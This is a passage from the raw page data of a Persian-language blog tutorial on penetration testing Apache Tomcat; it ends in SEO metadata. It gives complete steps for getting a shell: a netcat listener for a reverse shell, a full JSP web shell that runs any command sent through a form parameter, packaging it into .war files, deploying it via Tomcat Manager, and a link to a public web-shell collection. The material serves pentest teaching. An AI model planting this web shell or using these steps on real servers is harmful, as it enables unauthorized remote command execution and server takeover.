\u062f\u0633\u062a\u0631\u0633\u06cc \u0628\u0647 \u0641\u0627\u06cc\u0644 upload \u0634\u062f\u0647\u060c \u06cc\u06a9 netcat listener \u0631\u0648\u06cc \u067e\u0648\u0631\u062a \u06f1\u06f2\u06f3\u06f4 \u0631\u0627\u0647\u200c\u0627\u0646\u062f\u0627\u0632\u06cc \u06a9\u0646\u06cc\u062f.<\/span><\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\">rlwrap nc -lvnp 1234<\/pre>\n<p><span style=\"font-size: 10pt\">\u0628\u0631 \u0631\u0648\u06cc \u0645\u0633\u06cc\u0631 \/shell \u06a9\u0644\u06cc\u06a9 \u06a9\u0646\u06cc\u062f \u062a\u0627 \u0628\u0647 \u0641\u0627\u06cc\u0644 \u062f\u0633\u062a\u0631\u0633\u06cc \u06cc\u0627\u0641\u062a\u0647 \u0648 reverse shell \u0631\u0627 \u062f\u0631\u06cc\u0627\u0641\u062a \u06a9\u0646\u06cc\u062f.<\/span><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone  wp-image-19490\" src=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/18-2-300x108.png\" alt=\"\" width=\"547\" height=\"197\" srcset=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/18-2-300x108.png 300w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/18-2-150x54.png 150w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/18-2.png 587w\" sizes=\"(max-width: 547px) 100vw, 547px\" \/><\/p>\n<p>&nbsp;<\/p>\n<p><span style=\"font-size: 10pt\">Reverse shell \u0627\u0632 \u0637\u0631\u06cc\u0642 \u067e\u0648\u0631\u062a \u06f1\u06f2\u06f3\u06f4 \u062f\u0631\u06cc\u0627\u0641\u062a \u0645\u06cc\u200c\u0634\u0648\u062f.<\/span><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone  wp-image-19491\" src=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/19-2-300x210.png\" alt=\"\" width=\"540\" height=\"378\" srcset=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/19-2-300x210.png 300w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/19-2-768x538.png 768w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/19-2-150x105.png 150w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/19-2.png 970w\" sizes=\"(max-width: 540px) 100vw, 540px\" \/><\/p>\n<h2><strong>\u0628\u0647\u0631\u0647\u200c\u0628\u0631\u062f\u0627\u0631\u06cc \u062f\u0633\u062a\u06cc<\/strong> <strong>Web Shell<\/strong><\/h2>\n<p><span style=\"font-size: 10pt\">\u0628\u0631\u0627\u06cc \u0628\u0647\u200c\u062f\u0633\u062a\u200c\u0622\u0648\u0631\u062f\u0646 \u06cc\u06a9 web shell\u060c \u0645\u0647\u0627\u062c\u0645\u0627\u0646 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u0646\u062f \u0627\u0632 \u06cc\u06a9 \u0641\u0627\u06cc\u0644 .war \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u06a9\u0646\u0646\u062f \u06a9\u0647 \u0634\u0627\u0645\u0644 \u0641\u0627\u06cc\u0644\u200c\u0647\u0627\u06cc .jsp \u0628\u0627\u0634\u062f. \u067e\u0633 \u0627\u0632 upload \u0627\u06cc\u0646 \u0641\u0627\u06cc\u0644 .war \u0628\u0647 \u0633\u0631\u0648\u0631\u060c \u062f\u0633\u062a\u0631\u0633\u06cc \u0628\u0647 webshell \u0641\u0631\u0627\u0647\u0645 \u0645\u06cc\u200c\u0634\u0648\u062f.<\/span><\/p>\n<p><span style=\"font-size: 10pt\">\u0628\u0647\u200c\u0645\u0646\u0638\u0648\u0631 \u0627\u06cc\u062c\u0627\u062f \u06cc\u06a9 \u0641\u0627\u06cc\u0644 .war \u06a9\u0647 \u0634\u0627\u0645\u0644 \u0641\u0627\u06cc\u0644\u200c\u0647\u0627\u06cc .jsp \u0628\u0627\u0634\u062f\u060c \u0644\u0627\u0632\u0645 \u0627\u0633\u062a \u06a9\u0647 Java \u0631\u0648\u06cc \u0645\u0627\u0634\u06cc\u0646 Kali Linux \u0646\u0635\u0628 \u0634\u062f\u0647 \u0628\u0627\u0634\u062f.<\/span><\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\">apt install openjdk-21-jdk<\/pre>\n<p><span style=\"font-size: 10pt\">\u0627\u06a9\u0646\u0648\u0646 \u06cc\u06a9 \u062f\u0627\u06cc\u0631\u06a9\u062a\u0648\u0631\u06cc \u0628\u0647 \u0646\u0627\u0645 webshell \u0627\u06cc\u062c\u0627\u062f \u06a9\u0646\u06cc\u062f \u0648 \u0641\u0627\u06cc\u0644 index.jsp \u0631\u0627 \u062f\u0631\u0648\u0646 \u0622\u0646 \u0642\u0631\u0627\u0631 \u062f\u0647\u06cc\u062f.<\/span><\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\">mkdir webshell\r\ncd webshell\r\nnano index.jsp\r\n<\/pre>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone  wp-image-19492\" src=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/20-2-300x129.png\" alt=\"\" width=\"528\" height=\"227\" srcset=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/20-2-300x129.png 300w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/20-2-150x64.png 150w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/20-2.png 571w\" sizes=\"(max-width: 528px) 100vw, 528px\" \/><\/p>\n<p><span style=\"font-size: 10pt\">\u06a9\u062f \u0632\u06cc\u0631 \u0631\u0627 \u062f\u0631 \u0641\u0627\u06cc\u0644 index.jsp \u0642\u0631\u0627\u0631 \u062f\u0647\u06cc\u062f \u062a\u0627 web shell \u0627\u06cc\u062c\u0627\u062f \u0634\u0648\u062f.<\/span><\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\">&lt;FORM METHOD=GET ACTION='index.jsp'&gt;\r\n&lt;INPUT name='cmd' type=text&gt;\r\n&lt;INPUT type=submit value='Run'&gt;\r\n&lt;\/FORM&gt;\r\n&lt;%@ page import=\"java.io.*\" %&gt;\r\n&lt;%\r\n   String cmd = request.getParameter(\"cmd\");\r\n   String output = \"\";\r\n   if(cmd != null) {\r\n      String s = null;\r\n      try {\r\n         Process p = Runtime.getRuntime().exec(cmd,null,null);\r\n         BufferedReader sI = new BufferedReader(new\r\nInputStreamReader(p.getInputStream()));\r\n         while((s = sI.readLine()) != null) { output += s+\"&lt;\/br&gt;\"; }\r\n      }  catch(IOException e) {   e.printStackTrace();   }\r\n   }\r\n%&gt;\r\n&lt;pre&gt;&lt;%=output %&gt;&lt;\/pre&gt;<\/pre>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone  wp-image-19493\" src=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/21-2-300x179.png\" alt=\"\" width=\"558\" height=\"333\" srcset=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/21-2-300x179.png 300w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/21-2-1024x609.png 1024w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/21-2-768x457.png 768w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/21-2-150x89.png 150w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/21-2.png 1030w\" sizes=\"(max-width: 558px) 100vw, 558px\" \/>\u067e<\/p>\n<p><span style=\"font-size: 10pt\">\u067e\u0633 \u0627\u0632 \u0627\u06cc\u062c\u0627\u062f \u0641\u0627\u06cc\u0644 index.jsp\u060c \u0627\u06a9\u0646\u0648\u0646 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646 \u0628\u0627 \u062a\u0628\u062f\u06cc\u0644 \u062f\u0627\u06cc\u0631\u06a9\u062a\u0648\u0631\u06cc \u0628\u0647 \u06cc\u06a9 \u0641\u0627\u06cc\u0644 .war\u060c \u0628\u0633\u062a\u0647\u200c\u06cc \u0645\u0648\u0631\u062f\u0646\u0638\u0631 \u0631\u0627 \u0627\u06cc\u062c\u0627\u062f \u06a9\u0631\u062f.<\/span><\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\">jar -cvf ..\/webshell.war *<\/pre>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone  wp-image-19494\" src=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/22-2-300x56.png\" alt=\"\" width=\"568\" height=\"106\" srcset=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/22-2-300x56.png 300w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/22-2-1024x192.png 1024w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/22-2-768x144.png 768w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/22-2-150x28.png 150w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/22-2.png 1046w\" sizes=\"(max-width: 568px) 100vw, 568px\" \/><\/p>\n<p><span style=\"font-size: 10pt\">\u067e\u0633 \u0627\u0632 \u0627\u06cc\u062c\u0627\u062f \u0641\u0627\u06cc\u0644 webshell.war\u060c \u0622\u0646 \u0631\u0627 \u0627\u0632 \u0637\u0631\u06cc\u0642 \u0628\u062e\u0634 deploy \u062f\u0631 Tomcat Manager \u0628\u0627\u0631\u06af\u0630\u0627\u0631\u06cc \u06a9\u0646\u06cc\u062f.<\/span><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone  wp-image-19495\" src=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/23-2-300x102.png\" alt=\"\" width=\"574\" height=\"195\" srcset=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/23-2-300x102.png 300w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/23-2-768x260.png 768w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/23-2-150x51.png 150w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/23-2.png 960w\" sizes=\"(max-width: 574px) 100vw, 574px\" \/><\/p>\n<p><span style=\"font-size: 10pt\">\u0635\u0641\u062d\u0647\u200c\u06cc index.jsp \u062f\u0631\u0648\u0646 \u062f\u0627\u06cc\u0631\u06a9\u062a\u0648\u0631\u06cc webshell \u06a9\u0647 \u0628\u0627\u0631\u06af\u0630\u0627\u0631\u06cc \u0634\u062f\u0647 \u0627\u0633\u062a\u060c \u0642\u0627\u0628\u0644 \u062f\u0633\u062a\u0631\u0633\u06cc \u0627\u0633\u062a \u0648 \u0628\u0647 \u0627\u06cc\u0646 \u062a\u0631\u062a\u06cc\u0628 webshell \u0641\u0639\u0627\u0644 \u0645\u06cc\u200c\u0634\u0648\u062f.<\/span><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone  wp-image-19496\" src=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/24-1-300x98.png\" alt=\"\" width=\"576\" height=\"188\" srcset=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/24-1-300x98.png 300w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/24-1-150x49.png 150w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/24-1.png 698w\" sizes=\"(max-width: 576px) 100vw, 576px\" \/><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone  wp-image-19497\" src=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/25-1-300x189.png\" alt=\"\" width=\"579\" height=\"365\" srcset=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/25-1-300x189.png 300w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/25-1-1024x647.png 1024w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/25-1-768x485.png 768w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/25-1-150x95.png 150w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/25-1.png 1034w\" sizes=\"(max-width: 579px) 100vw, 579px\" \/><\/p>\n<p><span style=\"font-size: 10pt\">\u0631\u0648\u0634 \u062c\u0627\u06cc\u06af\u0632\u06cc\u0646 \u0628\u0631\u0627\u06cc \u0627\u0646\u062c\u0627\u0645 \u0628\u0647\u0631\u0647\u200c\u0628\u0631\u062f\u0627\u0631\u06cc \u062f\u0633\u062a\u06cc \u0641\u0648\u0642\u060c \u062f\u0627\u0646\u0644\u0648\u062f \u0641\u0627\u06cc\u0644 cmd.jsp \u0648 \u0633\u0627\u062e\u062a \u0641\u0627\u06cc\u0644 webshell.war \u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u0627\u0628\u0632\u0627\u0631 zip \u0627\u0633\u062a.<\/span><\/p>\n<p><span style=\"font-size: 10pt\">\u0641\u0627\u06cc\u0644 webshell jsp \u0631\u0627 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646 \u0627\u0632 \u0627\u06cc\u0646 <a href=\"https:\/\/github.com\/tennc\/webshell\/tree\/master\/fuzzdb-webshell\/jsp\">\u0622\u062f\u0631\u0633<\/a> \u062f\u0627\u0646\u0644\u0648\u062f \u06a9\u0631\u062f.<\/span><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone  wp-image-19498\" src=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/26-1-298x300.png\" alt=\"\" width=\"516\" height=\"519\" srcset=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/26-1-298x300.png 298w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/26-1-1017x1024.png 1017w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/26-1-150x151.png 150w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/26-1-768x773.png 768w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/26-1-96x96.png 96w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/26-1.png 1072w\" sizes=\"(max-width: 516px) 100vw, 516px\" \/><\/p>\n<p><span style=\"font-size: 10pt\">\u0633\u067e\u0633\u060c \u067e\u0633 \u0627\u0632 \u062f\u0627\u0646\u0644\u0648\u062f \u0641\u0627\u06cc\u0644 cmd.jsp\u060c \u0645\u06cc\u200c\u062a\u0648\u0627\u0646 \u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u062f\u0633\u062a\u0648\u0631 \u0632\u06cc\u0631 \u0641\u0627\u06cc\u0644 revshell.war \u0631\u0627 \u0627\u06cc\u062c\u0627\u062f \u06a9\u0631\u062f:<\/span><\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\">zip -r revshell.war cmd.jsp<\/pre>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone  wp-image-19499\" src=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/27-1-300x126.png\" alt=\"\" width=\"540\" height=\"227\" srcset=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/27-1-300x126.png 300w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/27-1-1024x430.png 1024w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/27-1-768x323.png 768w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/27-1-150x63.png 150w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/27-1.png 1285w\" sizes=\"(max-width: 540px) 100vw, 540px\" \/><\/p>\n<p><span style=\"font-size: 10pt\">\u062f\u0648\u0628\u0627\u0631\u0647\u060c \u0628\u0627 \u062a\u06a9\u0631\u0627\u0631 \u0647\u0645\u0627\u0646 \u0631\u0648\u0646\u062f\u06cc \u06a9\u0647 \u067e\u06cc\u0634\u200c\u062a\u0631 \u062a\u0648\u0636\u06cc\u062d \u062f\u0627\u062f\u0647 \u0634\u062f\u060c \u067e\u0633 \u0627\u0632 upload \u0641\u0627\u06cc\u0644 revshell.war \u0627\u0632 \u0637\u0631\u06cc\u0642 \u0642\u0627\u0628\u0644\u06cc\u062a deploy\u060c \u0645\u06cc\u200c\u062a\u0648\u0627\u0646 \u0628\u0627 \u062f\u0633\u062a\u0631\u0633\u06cc \u0628\u0647 \u0622\u062f\u0631\u0633 \u0632\u06cc\u0631\u060c web shell \u0631\u0627 \u0628\u0647\u200c\u062f\u0633\u062a \u0622\u0648\u0631\u062f:<\/span><\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\">http:\/\/192.168.1.5:8080\/revshell\/cmd.jsp<\/pre>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone  wp-image-19500\" src=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/28-1-300x108.png\" alt=\"\" width=\"536\" height=\"193\" srcset=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/28-1-300x108.png 300w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/28-1-150x54.png 150w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/28-1.png 712w\" sizes=\"(max-width: 536px) 100vw, 536px\" \/><\/p>\n<h2><strong>\u062c\u0645\u0639\u200c\u0628\u0646\u062f\u06cc<\/strong><\/h2>\n<p><span style=\"font-size: 10pt\">\u062f\u0631 \u0627\u0635\u0644\u060c Apache Tomcat \u0647\u0645\u0686\u0646\u0627\u0646 \u0628\u0647\u200c\u0639\u0646\u0648\u0627\u0646 \u06cc\u06a9\u06cc \u0627\u0632 \u06af\u0632\u06cc\u0646\u0647\u200c\u0647\u0627\u06cc \u0645\u062d\u0628\u0648\u0628 \u0628\u0631\u0627\u06cc deploy \u0628\u0631\u0646\u0627\u0645\u0647\u200c\u0647\u0627\u06cc \u0648\u0628 \u0645\u0628\u062a\u0646\u06cc \u0628\u0631 Java \u0628\u0627\u0642\u06cc \u0645\u0627\u0646\u062f\u0647 \u0627\u0633\u062a \u0648 \u062a\u0631\u06a9\u06cc\u0628\u06cc \u0627\u0632 \u0627\u0646\u0639\u0637\u0627\u0641\u200c\u067e\u0630\u06cc\u0631\u06cc \u0648 \u0627\u0645\u0646\u06cc\u062a \u0631\u0627 \u0627\u0631\u0627\u0626\u0647 \u0645\u06cc\u200c\u062f\u0647\u062f \u06a9\u0647 \u067e\u0627\u0633\u062e\u06af\u0648\u06cc \u0646\u06cc\u0627\u0632\u0647\u0627\u06cc \u0645\u062a\u0646\u0648\u0639 \u062a\u0648\u0633\u0639\u0647\u200c\u062f\u0647\u0646\u062f\u06af\u0627\u0646 \u0648 \u0645\u062f\u06cc\u0631\u0627\u0646 \u0633\u06cc\u0633\u062a\u0645 \u0627\u0633\u062a. \u0628\u0627 \u0627\u06cc\u0646 \u062d\u0627\u0644\u060c \u0628\u0647 \u062f\u0644\u06cc\u0644 misconfiguration\u0647\u0627\u060c \u0645\u0647\u0627\u062c\u0645\u0627\u0646 \u0642\u0627\u062f\u0631 \u062e\u0648\u0627\u0647\u0646\u062f \u0628\u0648\u062f \u0627\u0632 \u0622\u0646 \u0633\u0648\u0621\u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u06a9\u0631\u062f\u0647 \u0648 \u0627\u0642\u062f\u0627\u0645\u0627\u062a \u0646\u0627\u062e\u0648\u0627\u0633\u062a\u0647\u200c\u0627\u06cc \u0645\u0627\u0646\u0646\u062f Remote Code Execution \u0631\u0627 \u0627\u0646\u062c\u0627\u0645 \u062f\u0647\u0646\u062f.<\/span><\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Tomcat Penetration Testing \u0646\u0642\u0634 \u062d\u06cc\u0627\u062a\u06cc \u062f\u0631 \u0634\u0646\u0627\u0633\u0627\u06cc\u06cc \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc\u200c\u0647\u0627\u06cc \u0645\u0648\u062c\u0648\u062f \u062f\u0631 Apache Tomcat \u0627\u06cc\u0641\u0627 \u0645\u06cc\u200c\u06a9\u0646\u062f\u061b \u0633\u0631\u0648\u06cc\u0633\u06cc \u06a9\u0647 \u0628\u0647\u200c\u0637\u0648\u0631 \u06af\u0633\u062a\u0631\u062f\u0647 \u0628\u0647\u200c\u0639\u0646\u0648\u0627\u0646 \u06cc\u06a9 web server \u0648 servlet container \u062f\u0631 \u062a\u0648\u0633\u0639\u0647\u200c\u06cc \u0628\u0631\u0646\u0627\u0645\u0647\u200c\u0647\u0627\u06cc \u062a\u062d\u062a \u0648\u0628 \u0645\u0648\u0631\u062f \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0642\u0631\u0627\u0631 \u0645\u06cc\u200c\u06af\u06cc\u0631\u062f. \u062f\u0631 \u0627\u0628\u062a\u062f\u0627\u060c Apache Software Foundation \u0627\u06cc\u0646 \u067e\u0631\u0648\u0698\u0647 \u0631\u0627 \u0628\u0627 \u0647\u062f\u0641 \u0627\u0631\u0627\u0626\u0647\u200c\u06cc \u06cc\u06a9 \u067e\u0644\u062a\u0641\u0631\u0645 \u0646\u0645\u0627\u06cc\u0634\u06cc \u0628\u0631\u0627\u06cc \u0641\u0646\u0627\u0648\u0631\u06cc\u200c\u0647\u0627\u06cc Java Servlet \u0648 JavaServer Pages &hellip;<\/p>\n","protected":false},"author":14,"featured_media":19501,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[258,275,349],"tags":[],"class_list":["post-19472","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-teaching","category-penetration-test-article","category-slides"],"yoast_head":"<!-- This site is optimized with the Yoast SEO Premium plugin v26.5 (Yoast SEO v27.6) - https:\/\/yoast.com\/product\/yoast-seo-premium-wordpress\/ -->\n<title>\u062a\u0633\u062a \u0646\u0641\u0648\u0630 Tomcat - \u0628\u0644\u0627\u06af \u06af\u0631\u0648\u0647 \u0644\u06cc\u0627\u0646<\/title>\n<meta name=\"description\" content=\"Apache Tomcat \u06cc\u06a9 open-source web server \u0648 servlet container \u0627\u0633\u062a \u06a9\u0647 \u062a\u0648\u0633\u0637 Apache Software Foundation \u062a\u0648\u0633\u0639\u0647 \u062f\u0627\u062f\u0647 \u0634\u062f\u0647 \u0627\u0633\u062a.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/liangroup.net\/blog\/tomcat-penetration-testing\/\" \/>\n<meta property=\"og:locale\" content=\"fa_IR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\u062a\u0633\u062a \u0646\u0641\u0648\u0630 Tomcat\" \/>\n<meta property=\"og:description\" content=\"Apache Tomcat \u06cc\u06a9 open-source web server \u0648 servlet container \u0627\u0633\u062a \u06a9\u0647 \u062a\u0648\u0633\u0637 Apache Software Foundation \u062a\u0648\u0633\u0639\u0647 \u062f\u0627\u062f\u0647 \u0634\u062f\u0647 \u0627\u0633\u062a.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/liangroup.net\/blog\/tomcat-penetration-testing\/\" \/>\n<meta property=\"og:site_name\" content=\"\u0628\u0644\u0627\u06af \u06af\u0631\u0648\u0647 \u0644\u06cc\u0627\u0646\" \/>\n<meta property=\"article:published_time\" content=\"2025-05-24T11:25:21+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/apache-tomcat-rce-exploit-1.png\" \/>\n\t<meta property=\"og:image:width\" content=\"728\" \/>\n\t<meta property=\"og:image:height\" content=\"380\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"\u0633\u062c\u0627\u062f \u062a\u06cc\u0645\u0648\u0631\u06cc\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@liansecurity\" \/>\n<meta name=\"twitter:site\" content=\"@liansecurity\" \/>\n<meta name=\"twitter:label1\" content=\"\u0646\u0648\u0634\u062a\u0647\u200c\u0634\u062f\u0647 \u0628\u062f\u0633\u062a\" \/>\n\t<meta name=\"twitter:data1\" content=\"\u0633\u062c\u0627\u062f \u062a\u06cc\u0645\u0648\u0631\u06cc\" \/>\n\t<meta name=\"twitter:label2\" content=\"\u0632\u0645\u0627\u0646 \u062a\u0642\u0631\u06cc\u0628\u06cc \u0628\u0631\u0627\u06cc \u062e\u0648\u0627\u0646\u062f\u0646\" \/>\n\t<meta name=\"twitter:data2\" content=\"15 \u062f\u0642\u06cc\u0642\u0647\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/tomcat-penetration-testing\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/tomcat-penetration-testing\\\/\"},\"author\":{\"name\":\"\u0633\u062c\u0627\u062f \u062a\u06cc\u0645\u0648\u0631\u06cc\",\"@id\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/#\\\/schema\\\/person\\\/e328f67a35a843fd3accc4666b5eab0a\"},\"headline\":\"\u062a\u0633\u062a \u0646\u0641\u0648\u0630 Tomcat\",\"datePublished\":\"2025-05-24T11:25:21+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/tomcat-penetration-testing\\\/\"},\"wordCount\":320,\"commentCount\":0,\"image\":{\"@id\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/tomcat-penetration-testing\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/apache-tomcat-rce-exploit-1.png\",\"articleSection\":[\"\u0622\u0645\u0648\u0632\u0634\u200c\u0647\u0627\u06cc \u0644\u06cc\u0627\u0646\",\"\u0645\u0642\u0627\u0644\u0627\u062a \u062a\u0633\u062a \u0646\u0641\u0648\u0630\",\"\u06cc\u06cc\u06cc\u06cc \u0627\u0633\u0644\u0627\u06cc\u062f\"],\"inLanguage\":\"fa-IR\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/liangroup.net\\\/blog\\\/tomcat-penetration-testing\\\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/tomcat-penetration-testing\\\/\",\"url\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/tomcat-penetration-testing\\\/\",\"name\":\"\u062a\u0633\u062a \u0646\u0641\u0648\u0630 Tomcat - \u0628\u0644\u0627\u06af \u06af\u0631\u0648\u0647 \u0644\u06cc\u0627\u0646\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/tomcat-penetration-testing\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/tomcat-penetration-testing\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/apache-tomcat-rce-exploit-1.png\",\"datePublished\":\"2025-05-24T11:25:21+00:00\",\"author\":{\"@id\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/#\\\/schema\\\/person\\\/e328f67a35a843fd3accc4666b5eab0a\"},\"description\":\"Apache Tomcat \u06cc\u06a9 open-source web server \u0648 servlet container \u0627\u0633\u062a \u06a9\u0647 \u062a\u0648\u0633\u0637 Apache Software Foundation \u062a\u0648\u0633\u0639\u0647 \u062f\u0627\u062f\u0647 \u0634\u062f\u0647 \u0627\u0633\u062a.\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/tomcat-penetration-testing\\\/#breadcrumb\"},\"inLanguage\":\"fa-IR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/liangroup.net\\\/blog\\\/tomcat-penetration-testing\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"fa-IR\",\"@id\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/tomcat-penetration-testing\\\/#primaryimage\",\"url\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/apache-tomcat-rce-exploit-1.png\",\"contentUrl\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/apache-tomcat-rce-exploit-1.png\",\"width\":728,\"height\":380,\"caption\":\"\u062a\u0633\u062a \u0646\u0641\u0648\u0630 